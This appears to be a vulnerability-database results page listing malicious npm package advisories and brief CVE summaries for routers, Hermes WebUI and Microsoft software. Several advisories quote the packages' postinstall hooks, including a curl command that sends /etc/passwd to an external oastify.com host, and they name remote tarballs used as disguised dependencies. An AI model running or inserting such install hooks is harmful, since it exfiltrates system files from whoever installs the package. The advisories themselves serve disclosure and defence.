1085565 matches found
MAL-2026-5448 Malicious code in mazemap (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0 package.json declares its only dependency ltidisafe as a direct HTTPS tarball URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz...
MAL-2026-5409 Malicious code in @easy-entry/outside-registration-fop-navigator (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...
MAL-2026-5428 Malicious code in @shell-cabinet/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...
MAL-2026-5430 Malicious code in @sourceflow-uk/sourceflow-tracker (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/packuxfoundry.tgz — a...
CVE-2026-9213
A vulnerability in the affected NETGEAR gaming routers allows attackers with the ability to intercept and tamper with traffic between the router and the Internet, to execute code on the device...
CVE-2026-49959
Hermes WebUI before version 0.51.311 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by placing malicious executable Git configuration in a workspace repository's .git/config file. Attackers can exploit Git subprocess invocations in...
CVE-2026-48574
Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally...
CVE-2026-48569
Improper input validation in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally...
CVE-2026-48563
Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...
CVE-2026-47643
External control of file name or path in Azure Stack Edge allows an unauthorized attacker to execute code over a network...
CVE-2026-47652
Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally...
CVE-2026-47653
Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...
CVE-2026-47654
Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...
CVE-2026-47298
Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network...
CVE-2026-47635
Access of resource using incompatible type 'type confusion' in Microsoft Office allows an unauthorized attacker to execute code locally...
CVE-2026-47284
Exposure of sensitive information to an unauthorized actor in Visual Studio Code allows an unauthorized attacker to disclose information over a network...
CVE-2026-47287
Relative path traversal in Visual Studio Code allows an unauthorized attacker to perform tampering over a network...
CVE-2026-47288
Integer overflow or wraparound in Windows Kerberos allows an authorized attacker to execute code over an adjacent network...
CVE-2026-47289
Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...
CVE-2026-47291
Integer overflow or wraparound in Windows HTTP.sys allows an unauthorized attacker to execute code over a network...